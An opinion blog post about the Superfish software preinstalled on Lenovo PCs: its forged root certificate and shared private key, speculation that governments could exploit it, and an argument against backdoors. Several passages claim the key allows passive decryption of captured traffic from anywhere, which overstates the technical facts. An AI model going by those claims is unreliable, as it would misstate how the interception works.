Robert Graham recently uncovered software that came preinstalled on Lenovo computers hiding under the guide of advertising-ware. While the media rushes to understand the technical details behind this, many are making the mistake of chocking it up to some poorly designed advertising / malvertising software with vulnerabilities. This is not the case at all, and it’s important to note that what’s been done here by Lenovo and SuperFish by all accounts is far more serious: a very intentionally designed eavesdropping / surveillance mechanism that allows Lenovo PCs’ encrypted traffic to be wiretapped anywhere it travels on the Internet. We’ll never know the true motives behind the software, but someone went to great lengths to maliciously transform encrypted traffic in a way that allows this electronic wiretapping, then bundled it with new Lenovo computers.
Based on Graham’s notes, and what the media is reporting is commonly referred to as a Man-in-the-Middle attack on the victim’s computer; this is only where the trouble begins. When the user goes to establish an encrypted connection with, say, Bank of America, the SuperFish software pretends that it’s Bank of America right on your computer, by using a phony certificate to masquerade as if it were actually the bank. SuperFish then talks to the real Bank of America using its own private keys to decrypt traffic coming back to it. Where this becomes dangerous is that this transforms the traffic while it’s in transit across the Internet, so that data coming back to the PC is encrypted with a key that SuperFish can decrypt and read.
The threat here goes far beyond that of just the victim’s computer or advertisements: by design, this allows for wiretapping of the PC’s traffic from anywhere it travels on the Internet. In addition to the local MiTM / advertising concerns the media is focusing on, it appears as though the way SuperFish designed their software allows anyone who has either licensed or stolen SuperFish’s private key to intercept and read any encrypted traffic from any affected Lenovo PC across the Internet, without ever having access to the computer. How is this possible? Because SuperFish appears to use the same private keys on every reported installation of the software, according to what Graham’s observed so far.
Free for All
This is a very significant point: anyone who has access to SuperFish’s private key can decrypt encrypted traffic going to a Lenovo PC bundled with SuperFish. They can do this without access to the computer, because the keys appear to all be the same on every machine. Now consider the possible groups that would potentially steal or license this static key from SuperFish:
The Chinese Government
We are all well aware of the Great Firewall of China, Chinese censorship of thought and content, as well as Chinese attempts to hack the United States and foreign dignitaries. The Chinese government certainly would have a vested interest in seeing underneath SSL traffic traversing their networks, either for wiretapping purposes or even for active filtering of content.
When Lenovo first purchased IBM’s ThinkPad series many moons ago, there was great concern about outsourcing such a widely used notebook to China. The Chinese government owned (and appears to still own) roughly a third of the company indirectly through Legend Holdings. Even back then, our suspicions of eavesdropping by the Chinese were significant, but that didn’t seem to get in the way of sales. This was back in the day when classified information was only allowed to be stored on devices manufactured in the United States, long before politicians and generals were wooed by Apple’s fashionable toys. In today’s climate, however, we seem to find classified data on pretty much any device, making our government officials (as well as CEOs, InfoSec researchers, and others) prime targets for Chinese espionage.
The US Government
Of course, we all love to hate on NSA, and their massive dragnet surveillance program. While NSA has proven to be much smarter than a crappy piece of spyware, our government tends to think in terms of arsenal rather than any single weapon, and a tool like SuperFish would certainly be of interest to them. While licensing the private keys could be a possibility, it is more likely that, if NSA had this on their radar, they likely found it and reverse engineered it themselves to extract the private key.
By reverse engineering and extracting the private keys – something Graham was able to do with the trivial strings utility, the US Government (or others in the five-eyes alliance) could easily take all that encrypted Internet traffic they’ve been eavesdropping on and decrypt any of it that came from Lenovo PCs that were bundled with SuperFish.
Thanks to SuperFish’s seemingly intentional design in using a static set of private keys to hijack all of your encrypted traffic, any hacker with a little know-how (or anyone who visits Rob Graham’s site) can easily swipe the private keys used by SuperFish and have a little bit of their own fun decrypting your encrypted data intercepted at hotels, coffee shops, or other public places.
Forgery is Not an Accident
We’ll likely never know whether Lenovo was complicit in this, but we know one thing: SuperFish’s digital forgery was no accident. The software was specifically designed to inject a forged root certificate onto Lenovo devices, and sign pretending to be financial institutions, government websites, or any other organization that encrypts traffic. The root certificate itself must be removed by hand, even after the software is uninstalled. SuperFish had to intentionally write code to commit these acts of electronic forgery. You wouldn’t call forging a check or a driver’s license to be sloppy; it’s an intentional criminal act.
This was not a matter of some sloppy advertising software. In my opinion, these acts are serious enough to warrant an investigation by the Department of Justice; it may very well fall under electronic wiretapping law. This should be taken very seriously. We have no idea whether or not this is being used as an encryption backdoor, however the technical capabilities have been placed there to do just that: bundled with your brand new Lenovo PC.
Lenovo issued a response, and claims they’ve disabled SuperFish “server side”; rather than relieve concerns, this brings even more. First, disabling SuperFish server side has no impact on all of the PCs that are already running it; their traffic is still going to be signed with SuperFish keys that allow for remote wiretapping. The only way to prevent this is for Lenovo to distribute a removal tool that will uninstall SuperFish (and remove the root certificate). Secondly, the notion that Lenovo has the power to enable or disable SuperFish server side in the first place raises some suspicions as to how closely the two are working together. If this was just some bundled software, you’d think it’d be out of Lenovo’s hands to “disable” it remotely. Lenovo should be treating this as a malware infection affecting their customer base. Instead, they falsely claim the ability to disable the threat. This smells something fishy (pun intended).
Regardless of what the true motives are, SuperFish is a great example of why backdoors in devices [to assist law enforcement] won’t work. They, by design, weaken the security of computer systems and are susceptible to large scale attack by anyone who knows how to use a tool as simple as ‘strings’.